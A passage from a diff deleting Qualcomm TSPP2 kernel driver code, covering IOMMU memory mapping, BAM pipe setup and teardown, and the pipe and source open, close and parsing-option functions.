-- ret = ion_map_iommu(pipe->cfg.ion_client,
-- pipe->cfg.buffer_handle,
-- domain,
-- partition,
-- align, 0, &pipe->iova,
-- &dummy_size, 0, 0); /* Uncached mapping */
--
-- if (ret) {
-- pr_err("%s: Failed mapping buffer to TSPP2, %d\n",
-- __func__, ret);
-- goto err_out;
-- }
-- }
--
-- if (pipe->cfg.is_secure) {
-- reg = readl_relaxed(pipe->device->base + TSPP2_PIPE_SECURITY);
-- reg |= (0x1 << pipe->hw_index);
-- writel_relaxed(reg, pipe->device->base + TSPP2_PIPE_SECURITY);
-- }
--
-- dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--
--err_out:
-- if (hlos_group_attached) {
-- iommu_detach_group(pipe->device->iommu_info.hlos_domain,
-- pipe->device->iommu_info.hlos_group);
-- }
--
-- if (cpz_group_attached) {
-- iommu_detach_group(pipe->device->iommu_info.cpz_domain,
-- pipe->device->iommu_info.cpz_group);
-- }
--
-- if
(vbif_clk_started)
-- tspp2_vbif_clock_stop(pipe->device);
--
-- return ret;
--}
--
--/**
-- * tspp2_pipe_memory_terminate() - Unmap pipe memory.
-- *
-- * @pipe: The pipe to work on.
-- *
-- * Unmap the pipe's memory and clear the pipe's secure bit.
-- */
--static void tspp2_pipe_memory_terminate(struct tspp2_pipe *pipe)
--{
-- u32 reg;
-- int domain = 0;
-- int partition = 0;
--
-- if (pipe->cfg.is_secure) {
-- domain = pipe->device->iommu_info.cpz_domain_num;
-- partition = pipe->device->iommu_info.cpz_partition;
-- } else {
-- domain = pipe->device->iommu_info.hlos_domain_num;
-- partition = pipe->device->iommu_info.hlos_partition;
-- }
--
-- if (!tspp2_iommu_bypass) {
-- ion_unmap_iommu(pipe->cfg.ion_client,
-- pipe->cfg.buffer_handle,
-- domain,
-- partition);
--
-- /*
-- * Opposite to what is done in tspp2_pipe_memory_init(),
-- * here we detach the IOMMU group when it is no longer in use.
-- */
-- if (pipe->cfg.is_secure &&
-- (pipe->device->num_secured_opened_pipes == 0)) {
-- pr_debug("%s: detaching CPZ group\n", __func__);
-- iommu_detach_group(
-- pipe->device->iommu_info.cpz_domain,
-- pipe->device->iommu_info.cpz_group);
-- }
--
-- if ((pipe->device->num_secured_opened_pipes +
-- pipe->device->num_non_secured_opened_pipes) == 0) {
-- pr_debug("%s: detaching HLOS group\n", __func__);
-- iommu_detach_group(
-- pipe->device->iommu_info.hlos_domain,
-- pipe->device->iommu_info.hlos_group);
-- tspp2_vbif_clock_stop(pipe->device);
-- }
-- } else if ((pipe->device->num_secured_opened_pipes +
-- pipe->device->num_non_secured_opened_pipes) == 0) {
-- tspp2_vbif_clock_stop(pipe->device);
-- }
--
-- pipe->iova = 0;
--
-- if (pipe->cfg.is_secure) {
-- reg = readl_relaxed(pipe->device->base + TSPP2_PIPE_SECURITY);
-- reg &= ~(0x1 << pipe->hw_index);
-- writel_relaxed(reg, pipe->device->base + TSPP2_PIPE_SECURITY);
-- }
--
-- dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--}
--
--/**
-- * tspp2_sps_pipe_init() - BAM SPS pipe configuration and
initialization
-- *
-- * @pipe: The pipe to work on.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_sps_pipe_init(struct tspp2_pipe *pipe)
--{
-- u32 descriptors_num;
-- unsigned long dummy_size = 0;
-- int ret = 0;
-- int iommu_mapped = 0;
--
-- if (pipe->cfg.buffer_size % pipe->cfg.sps_cfg.descriptor_size) {
-- pr_err(
-- "%s: Buffer size %d is not aligned to descriptor size %d\n",
-- __func__, pipe->cfg.buffer_size,
-- pipe->cfg.sps_cfg.descriptor_size);
-- return -EINVAL;
-- }
--
-- pipe->sps_pipe = sps_alloc_endpoint();
-- if (!pipe->sps_pipe) {
-- pr_err("%s: Failed to allocate BAM pipe\n", __func__);
-- return -ENOMEM;
-- }
--
-- /* get default configuration */
-- sps_get_config(pipe->sps_pipe, &pipe->sps_connect_cfg);
-- if (pipe->cfg.pipe_mode == TSPP2_SRC_PIPE_INPUT) {
-- pipe->sps_connect_cfg.mode = SPS_MODE_DEST;
-- pipe->sps_connect_cfg.source = SPS_DEV_HANDLE_MEM;
-- pipe->sps_connect_cfg.destination = pipe->device->bam_handle;
-- pipe->sps_connect_cfg.dest_pipe_index = pipe->hw_index;
-- } else {
-- pipe->sps_connect_cfg.mode = SPS_MODE_SRC;
-- pipe->sps_connect_cfg.source = pipe->device->bam_handle;
-- pipe->sps_connect_cfg.destination = SPS_DEV_HANDLE_MEM;
-- pipe->sps_connect_cfg.src_pipe_index = pipe->hw_index;
-- }
-- pipe->sps_connect_cfg.desc.base = NULL;
-- pipe->sps_connect_cfg.options = pipe->cfg.sps_cfg.setting;
-- descriptors_num = (pipe->cfg.buffer_size /
-- pipe->cfg.sps_cfg.descriptor_size);
--
-- /*
-- * If size of descriptors FIFO can hold N descriptors, we can submit
-- * (N-1) descriptors only, therefore we allocate extra descriptor
-- */
-- descriptors_num++;
-- pipe->sps_connect_cfg.desc.size = (descriptors_num *
-- sizeof(struct sps_iovec));
--
-- if (tspp2_iommu_bypass) {
-- pipe->sps_connect_cfg.desc.base = dma_alloc_coherent(NULL,
-- pipe->sps_connect_cfg.desc.size,
-- &pipe->sps_connect_cfg.desc.phys_base,
-- GFP_KERNEL);
--
-- if (!pipe->sps_connect_cfg.desc.base) {
-- pr_err("%s: Failed to
allocate descriptor FIFO\n",
-- __func__);
-- ret = -ENOMEM;
-- goto init_sps_failed_free_endpoint;
-- }
-- } else {
-- pipe->desc_ion_handle = ion_alloc(pipe->cfg.ion_client,
-- pipe->sps_connect_cfg.desc.size,
-- SZ_4K, ION_HEAP(ION_IOMMU_HEAP_ID), 0);
--
-- if (!pipe->desc_ion_handle) {
-- pr_err("%s: Failed to allocate descriptors via ION\n",
-- __func__);
-- ret = -ENOMEM;
-- goto init_sps_failed_free_endpoint;
-- }
--
-- ret = ion_map_iommu(pipe->cfg.ion_client,
-- pipe->desc_ion_handle,
-- pipe->device->iommu_info.hlos_domain_num,
-- pipe->device->iommu_info.hlos_partition,
-- SZ_4K, 0,
-- &pipe->sps_connect_cfg.desc.phys_base,
-- &dummy_size, 0, 0); /* Uncached mapping */
--
-- if (ret) {
-- pr_err("%s: Failed mapping descriptors to IOMMU\n",
-- __func__);
-- goto init_sps_failed_free_mem;
-- }
--
-- iommu_mapped = 1;
--
-- pipe->sps_connect_cfg.desc.base =
-- ion_map_kernel(pipe->cfg.ion_client,
-- pipe->desc_ion_handle);
--
-- if (!pipe->sps_connect_cfg.desc.base) {
-- pr_err("%s: Failed mapping descriptors to kernel\n",
-- __func__);
-- ret = -ENOMEM;
-- goto init_sps_failed_free_mem;
-- }
-- }
--
-- ret = sps_connect(pipe->sps_pipe, &pipe->sps_connect_cfg);
-- if (ret) {
-- pr_err("%s: Failed to connect BAM, %d\n", __func__, ret);
-- goto init_sps_failed_free_mem;
-- }
--
-- pipe->sps_event.options = pipe->cfg.sps_cfg.wakeup_events;
-- if (pipe->sps_event.options) {
-- pipe->sps_event.mode = SPS_TRIGGER_CALLBACK;
-- pipe->sps_event.callback = pipe->cfg.sps_cfg.callback;
-- pipe->sps_event.xfer_done = NULL;
-- pipe->sps_event.user = pipe->cfg.sps_cfg.user_info;
--
-- ret = sps_register_event(pipe->sps_pipe, &pipe->sps_event);
-- if (ret) {
-- pr_err("%s: Failed to register pipe event, %d\n",
-- __func__, ret);
-- goto init_sps_failed_free_connection;
-- }
-- }
--
-- dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--
--init_sps_failed_free_connection:
-- sps_disconnect(pipe->sps_pipe);
--init_sps_failed_free_mem:
-- if
(tspp2_iommu_bypass) {
-- dma_free_coherent(NULL, pipe->sps_connect_cfg.desc.size,
-- pipe->sps_connect_cfg.desc.base,
-- pipe->sps_connect_cfg.desc.phys_base);
-- } else {
-- if (pipe->sps_connect_cfg.desc.base)
-- ion_unmap_kernel(pipe->cfg.ion_client,
-- pipe->desc_ion_handle);
--
-- if (iommu_mapped) {
-- ion_unmap_iommu(pipe->cfg.ion_client,
-- pipe->desc_ion_handle,
-- pipe->device->iommu_info.hlos_domain_num,
-- pipe->device->iommu_info.hlos_partition);
-- }
--
-- ion_free(pipe->cfg.ion_client, pipe->desc_ion_handle);
-- }
--init_sps_failed_free_endpoint:
-- sps_free_endpoint(pipe->sps_pipe);
--
-- return ret;
--}
--
--/**
-- * tspp2_sps_queue_descriptors() - Queue BAM SPS descriptors
-- *
-- * @pipe: The pipe to work on.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_sps_queue_descriptors(struct tspp2_pipe *pipe)
--{
-- int ret = 0;
-- u32 data_offset = 0;
-- u32 desc_length = pipe->cfg.sps_cfg.descriptor_size;
-- u32 desc_flags = pipe->cfg.sps_cfg.descriptor_flags;
-- u32 data_length = pipe->cfg.buffer_size;
--
-- while (data_length > 0) {
-- ret = sps_transfer_one(pipe->sps_pipe,
-- pipe->iova + data_offset,
-- desc_length,
-- pipe->cfg.sps_cfg.user_info,
-- desc_flags);
--
-- if (ret) {
-- pr_err("%s: sps_transfer_one failed, %d\n",
-- __func__, ret);
-- return ret;
-- }
--
-- data_offset += desc_length;
-- data_length -= desc_length;
-- }
--
-- return 0;
--}
--
--/**
-- * tspp2_sps_pipe_terminate() - Disconnect and terminate SPS BAM pipe
-- *
-- * @pipe: The pipe to work on.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_sps_pipe_terminate(struct tspp2_pipe *pipe)
--{
-- int ret;
--
-- ret = sps_disconnect(pipe->sps_pipe);
-- if (ret) {
-- pr_err("%s: failed to disconnect BAM pipe, %d\n",
-- __func__, ret);
-- return ret;
-- }
-- if (tspp2_iommu_bypass) {
-- dma_free_coherent(NULL, pipe->sps_connect_cfg.desc.size,
-- pipe->sps_connect_cfg.desc.base,
-- pipe->sps_connect_cfg.desc.phys_base);
-- } else {
-- ion_unmap_kernel(pipe->cfg.ion_client,
-- pipe->desc_ion_handle);
--
-- ion_unmap_iommu(pipe->cfg.ion_client,
-- pipe->desc_ion_handle,
-- pipe->device->iommu_info.hlos_domain_num,
-- pipe->device->iommu_info.hlos_partition);
--
-- ion_free(pipe->cfg.ion_client, pipe->desc_ion_handle);
-- }
-- pipe->sps_connect_cfg.desc.base = NULL;
--
-- ret = sps_free_endpoint(pipe->sps_pipe);
-- if (ret) {
-- pr_err("%s: failed to release BAM end-point, %d\n",
-- __func__, ret);
-- return ret;
-- }
--
-- return 0;
--}
--
--/**
-- * tspp2_pipe_open() - Open a pipe for use.
-- *
-- * @dev_id: TSPP2 device ID.
-- * @cfg: Pipe configuration parameters.
-- * @iova: TSPP2 IOMMU virtual address of the pipe's buffer.
-- * @pipe_handle: Opened pipe handle.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_pipe_open(u32 dev_id,
-- const struct tspp2_pipe_config_params *cfg,
-- ion_phys_addr_t *iova,
-- u32 *pipe_handle)
--{
-- struct tspp2_device *device;
-- struct tspp2_pipe *pipe;
-- int i;
-- int ret = 0;
--
-- if (dev_id >= TSPP2_NUM_DEVICES) {
-- pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
-- return -ENODEV;
-- }
--
-- if (!cfg || !iova || !pipe_handle) {
-- pr_err("%s: Invalid parameters\n", __func__);
-- return -EINVAL;
-- }
--
-- /* Some minimal sanity tests on the pipe configuration: */
-- if (!cfg->ion_client || !cfg->buffer_handle) {
-- pr_err("%s: Invalid parameters\n", __func__);
-- return -EINVAL;
-- }
--
-- device = tspp2_devices[dev_id];
-- if (!device) {
-- pr_err("%s: Invalid device\n", __func__);
-- return -ENODEV;
-- }
--
-- ret = pm_runtime_get_sync(device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&device->mutex)) {
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -EPERM;
-- }
--
-- /* Find a free pipe */
-- for (i = 0; i < TSPP2_NUM_PIPES; i++) {
-- pipe = &device->pipes[i];
-- if (!pipe->opened)
-- break;
-- }
-- if (i == TSPP2_NUM_PIPES) {
-- pr_err("%s: No available pipes\n", __func__);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -ENOMEM;
-- }
--
-- pipe->hw_index = i;
-- /* Actual pipe threshold is set when the pipe is attached to a source */
-- pipe->threshold = 0;
-- pipe->cfg = *cfg;
-- pipe->ref_cnt = 0;
-- /* device back-pointer is already initialized, always remains valid */
--
-- ret = tspp2_pipe_memory_init(pipe);
-- if (ret) {
-- pr_err("%s: Error initializing pipe memory\n", __func__);
--
mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return ret;
-- }
-- ret = tspp2_sps_pipe_init(pipe);
-- if (ret) {
-- pr_err("%s: Error initializing BAM pipe\n", __func__);
-- tspp2_pipe_memory_terminate(pipe);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return ret;
-- }
--
-- /* For output pipes, we queue BAM descriptors here so they are ready */
-- if (pipe->cfg.pipe_mode == TSPP2_SRC_PIPE_OUTPUT) {
-- ret = tspp2_sps_queue_descriptors(pipe);
-- if (ret) {
-- pr_err("%s: Error queuing BAM pipe descriptors\n",
-- __func__);
-- tspp2_sps_pipe_terminate(pipe);
-- tspp2_pipe_memory_terminate(pipe);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return ret;
-- }
-- }
--
-- /* Reset counter */
-- writel_relaxed((0x1 << pipe->hw_index),
-- device->base + TSPP2_DATA_NOT_SENT_ON_PIPE_RESET);
--
-- /* Return handle to the caller */
-- *pipe_handle = (u32)pipe;
-- *iova = pipe->iova;
--
-- pipe->opened = 1;
-- if (pipe->cfg.is_secure)
-- device->num_secured_opened_pipes++;
-- else
-- device->num_non_secured_opened_pipes++;
--
-- mutex_unlock(&device->mutex);
--
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_pipe_open);
--
--/**
-- * tspp2_pipe_close() - Close an opened pipe.
-- *
-- * @pipe_handle: Pipe to be closed.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_pipe_close(u32 pipe_handle)
--{
-- int ret;
-- struct tspp2_pipe *pipe = (struct tspp2_pipe *)pipe_handle;
--
-- if (!pipe) {
-- pr_err("%s: Invalid pipe handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(pipe->device->dev);
-- if (ret < 0)
-- return ret;
--
-- mutex_lock(&pipe->device->mutex);
--
-- if (!pipe->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&pipe->device->mutex);
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
-- return -EPERM;
-- }
--
-- if (!pipe->opened) {
-- pr_err("%s: Pipe already closed\n", __func__);
-- mutex_unlock(&pipe->device->mutex);
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
-- return -EINVAL;
-- }
--
-- if (pipe->ref_cnt > 0) {
-- pr_err("%s: Pipe %u is still attached to a source\n",
-- __func__, pipe_handle);
-- mutex_unlock(&pipe->device->mutex);
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
-- return -EPERM;
-- }
--
-- /*
-- * Note: need to decrement the pipe reference count here, before
-- * calling tspp2_pipe_memory_terminate().
-- */
-- if (pipe->cfg.is_secure)
-- pipe->device->num_secured_opened_pipes--;
-- else
-- pipe->device->num_non_secured_opened_pipes--;
--
-- tspp2_sps_pipe_terminate(pipe);
-- tspp2_pipe_memory_terminate(pipe);
--
-- pipe->iova = 0;
-- pipe->opened = 0;
--
-- mutex_unlock(&pipe->device->mutex);
--
-- pm_runtime_mark_last_busy(pipe->device->dev);
-- pm_runtime_put_autosuspend(pipe->device->dev);
--
-- dev_dbg(pipe->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_pipe_close);
--
--/* Source API functions */
--
--/**
-- * tspp2_src_open() - Open a new source for use.
-- *
-- * @dev_id: TSPP2 device ID.
-- * @cfg: Source configuration parameters.
-- * @src_handle: Opened source handle.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_open(u32 dev_id,
-- struct tspp2_src_cfg *cfg,
-- u32 *src_handle)
--{
-- int ret;
-- int i;
-- struct tspp2_device *device;
-- struct tspp2_src *src;
-- enum tspp2_src_input input;
--
-- if (dev_id >= TSPP2_NUM_DEVICES) {
-- pr_err("%s: Invalid device ID %d\n", __func__, dev_id);
-- return -ENODEV;
-- }
-- if (!src_handle) {
-- pr_err("%s: Invalid source handle pointer\n", __func__);
-- return -EINVAL;
-- }
-- if (!cfg) {
-- pr_err("%s: Invalid configuration parameters\n", __func__);
-- return -EINVAL;
-- }
--
-- device = tspp2_devices[dev_id];
-- if (!device) {
-- pr_err("%s: Invalid device\n", __func__);
-- return -ENODEV;
-- }
--
-- ret = pm_runtime_get_sync(device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&device->mutex)) {
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -EPERM;
-- }
--
-- input = cfg->input;
-- if ((input == TSPP2_INPUT_TSIF0) || (input == TSPP2_INPUT_TSIF1)) {
-- /* Input from TSIF */
-- if (device->tsif_sources[input].opened) {
-- pr_err("%s: TSIF input %d already opened\n",
-- __func__, input);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -EINVAL;
-- }
-- src = &device->tsif_sources[input];
--
-- /*
-- * When writing to HW registers that are relevant to sources
-- * of both TSIF and memory input types, the register offsets
-- * for the TSIF-related registers come after the memory-related
-- * registers. For example: for TSPP2_SRC_CONFIG(n), n=[0..9],
-- * indexes 0..7 are for memory inputs, and indexes 8, 9 are
-- * for TSIF inputs.
-- */
-- src->hw_index = TSPP2_NUM_MEM_INPUTS + input;
--
-- /* Save TSIF source parameters in TSIF device */
-- device->tsif_devices[input].mode =
-- cfg->params.tsif_params.tsif_mode;
-- device->tsif_devices[input].clock_inverse =
-- cfg->params.tsif_params.clock_inverse;
-- device->tsif_devices[input].data_inverse =
-- cfg->params.tsif_params.data_inverse;
-- device->tsif_devices[input].sync_inverse =
-- cfg->params.tsif_params.sync_inverse;
-- device->tsif_devices[input].enable_inverse =
-- cfg->params.tsif_params.enable_inverse;
-- } else {
-- /* Input from memory */
-- for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++) {
-- if (!device->mem_sources[i].opened)
-- break;
-- }
-- if (i == TSPP2_NUM_MEM_INPUTS) {
-- pr_err("%s: No memory inputs available\n", __func__);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -ENOMEM;
-- }
--
-- src = &device->mem_sources[i];
-- src->hw_index = i;
-- }
--
-- src->opened = 1;
-- src->input = input;
-- src->pkt_format = TSPP2_PACKET_FORMAT_188_RAW; /* default value */
-- src->scrambling_bits_monitoring = TSPP2_SRC_SCRAMBLING_MONITOR_NONE;
-- INIT_LIST_HEAD(&src->batches_list);
-- INIT_LIST_HEAD(&src->filters_list);
-- src->input_pipe = NULL;
-- INIT_LIST_HEAD(&src->output_pipe_list);
-- src->num_associated_batches = 0;
-- src->num_associated_pipes = 0;
-- src->num_associated_filters = 0;
-- src->reserved_filter_hw_index = 0;
-- src->event_callback = NULL;
-- src->event_cookie = NULL;
-- src->event_bitmask = 0;
-- src->enabled = 0;
-- /* device back-pointer is already initialized, always remains valid */
--
-- /* Reset source-related registers */
-- if ((input == TSPP2_INPUT_TSIF0) || (input == TSPP2_INPUT_TSIF1)) {
-- writel_relaxed((0x1 << TSIF_INPUT_SRC_CONFIG_16_BATCHES_OFFS),
-- device->base +
-- TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
-- } else {
-- /*
-- * Disable memory inputs. Set mode of operation to 16 batches.
-- * Configure last batch to be associated with this source.
-- */
-- writel_relaxed(TSPP2_DEFAULT_MEM_SRC_CONFIG,
-- device->base +
-- TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
-- }
-- writel_relaxed(0, device->base +
-- TSPP2_SRC_DEST_PIPES(src->hw_index));
-- writel_relaxed(TSPP2_DEFAULT_SRC_CONFIG, device->base +
-- TSPP2_SRC_CONFIG(src->hw_index));
-- writel_relaxed((0x1 << src->hw_index),
-- device->base + TSPP2_SRC_TOTAL_TSP_RESET);
-- writel_relaxed((0x1 << src->hw_index),
-- device->base + TSPP2_SRC_FILTERED_OUT_TSP_RESET);
--
-- /* Return handle to the caller */
-- *src_handle = (u32)src;
--
-- mutex_unlock(&device->mutex);
--
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_src_open);
--
--/**
-- * tspp2_src_close() - Close an opened source.
-- *
-- * @src_handle: Source to be closed.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_close(u32 src_handle)
--{
-- unsigned long flags;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
--
-- mutex_lock(&src->device->mutex);
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source already closed\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- return -EINVAL;
-- }
--
-- if (src->enabled) {
-- pr_err("%s: Source needs to be disabled before it can be closed\n",
-- __func__);
-- mutex_unlock(&src->device->mutex);
-- return -EPERM;
-- }
--
-- /* Verify resources have been released by the caller */
-- if ((src->num_associated_batches > 0) ||
-- (src->num_associated_pipes > 0) ||
-- (src->num_associated_filters > 0)) {
-- pr_err("%s: Source's resources need to be removed before it can be closed\n",
--
__func__);
-- mutex_unlock(&src->device->mutex);
-- return -EPERM;
-- }
--
-- /*
-- * Most fields are reset to default values when opening a source, so
-- * there is no need to reset them all here. We only need to mark the
-- * source as closed.
-- */
-- src->opened = 0;
-- spin_lock_irqsave(&src->device->spinlock, flags);
-- src->event_callback = NULL;
-- src->event_cookie = NULL;
-- src->event_bitmask = 0;
-- spin_unlock_irqrestore(&src->device->spinlock, flags);
-- src->enabled = 0;
--
-- /*
-- * Source-related HW registers are reset when opening a source, so
-- * we don't reser them here. Note that a source is disabled before
-- * it is closed, so no need to disable it here either.
-- */
--
-- mutex_unlock(&src->device->mutex);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_src_close);
--
--/**
-- * tspp2_src_parsing_option_set() - Set source parsing configuration option.
-- *
-- * @src_handle: Source to configure.
-- * @option: Parsing configuration option to enable / disable.
-- * @enable: Enable / disable option.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_parsing_option_set(u32 src_handle,
-- enum tspp2_src_parsing_option option,
-- int enable)
--{
-- int ret;
-- u32 reg = 0;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- reg = readl_relaxed(src->device->base +
-- TSPP2_SRC_CONFIG(src->hw_index));
--
-- switch (option) {
-- case TSPP2_SRC_PARSING_OPT_CHECK_CONTINUITY:
-- if (enable)
-- reg |= (0x1 << SRC_CONFIG_CHECK_CONT_OFFS);
-- else
-- reg &= ~(0x1 << SRC_CONFIG_CHECK_CONT_OFFS);
-- break;
-- case TSPP2_SRC_PARSING_OPT_IGNORE_DISCONTINUITY:
-- if (enable)
-- reg |= (0x1 << SRC_CONFIG_IGNORE_DISCONT_OFFS);
-- else
-- reg &= ~(0x1 << SRC_CONFIG_IGNORE_DISCONT_OFFS);
-- break;
-- case TSPP2_SRC_PARSING_OPT_ASSUME_DUPLICATE_PACKETS:
-- if (enable)
-- reg |= (0x1 << SRC_CONFIG_ASSUME_DUPLICATES_OFFS);
-- else
-- reg &= ~(0x1 << SRC_CONFIG_ASSUME_DUPLICATES_OFFS);
-- break;
-- case TSPP2_SRC_PARSING_OPT_DISCARD_INVALID_AF_PACKETS:
-- if (enable)
-- reg |= (0x1 << SRC_CONFIG_DISCARD_INVALID_AF_OFFS);
-- else
-- reg &= ~(0x1 << SRC_CONFIG_DISCARD_INVALID_AF_OFFS);
-- break;
-- case TSPP2_SRC_PARSING_OPT_VERIFY_PES_START:
-- if (enable)
-- reg |= (0x1 <<
SRC_CONFIG_VERIFY_PES_START_OFFS);
-- else
-- reg &= ~(0x1 << SRC_CONFIG_VERIFY_PES_START_OFFS);
-- break;
-- default:
-- pr_err("%s: Invalid option %d\n", __func__, option);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- writel_relaxed(reg, src->device->base +
-- TSPP2_SRC_CONFIG(src->hw_index));
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_src_parsing_option_set);
--
--/**
-- * tspp2_src_parsing_option_get() - Get source parsing configuration option.
-- *
-- * @src_handle: Source handle.
-- * @option: Parsing configuration option to get.
-- * @enable: Option's enable / disable indication.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_parsing_option_get(u32 src_handle,
-- enum tspp2_src_parsing_option option,
-- int *enable)
--{
-- int ret;
-- u32 reg = 0;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
-- if (!enable) {
-- pr_err("%s: NULL pointer\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- mutex_unlock(&src->device->mutex);
--
pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- reg = readl_relaxed(src->device->base +
-- TSPP2_SRC_CONFIG(src->hw_index));
--
-- switch (option) {
-- case TSPP2_SRC_PARSING_OPT_CHECK_CONTINUITY:
-- *enable = ((reg >> SRC_CONFIG_CHECK_CONT_OFFS) & 0x1);
-- break;
-- case TSPP2_SRC_PARSING_OPT_IGNORE_DISCONTINUITY:
-- *enable = ((reg >> SRC_CONFIG_IGNORE_DISCONT_OFFS) & 0x1);
-- break;
-- case TSPP2_SRC_PARSING_OPT_ASSUME_DUPLICATE_PACKETS:
-- *enable = ((reg >> SRC_CONFIG_ASSUME_DUPLICATES_OFFS) & 0x1);
-- break;
-- case TSPP2_SRC_PARSING_OPT_DISCARD_INVALID_AF_PACKETS:
-- *enable = ((reg >> SRC_CONFIG_DISCARD_INVALID_AF_OFFS) & 0x1);
-- break;
-- case TSPP2_SRC_PARSING_OPT_VERIFY_PES_START:
-- *enable = ((reg >> SRC_CONFIG_VERIFY_PES_START_OFFS) & 0x1);
